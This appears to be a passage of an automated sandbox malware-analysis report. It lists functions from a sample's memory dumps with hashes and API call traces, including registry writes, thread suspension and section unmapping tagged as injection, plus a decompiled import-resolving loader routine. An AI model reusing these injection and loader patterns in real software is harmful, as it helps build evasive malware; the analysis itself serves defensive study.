  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
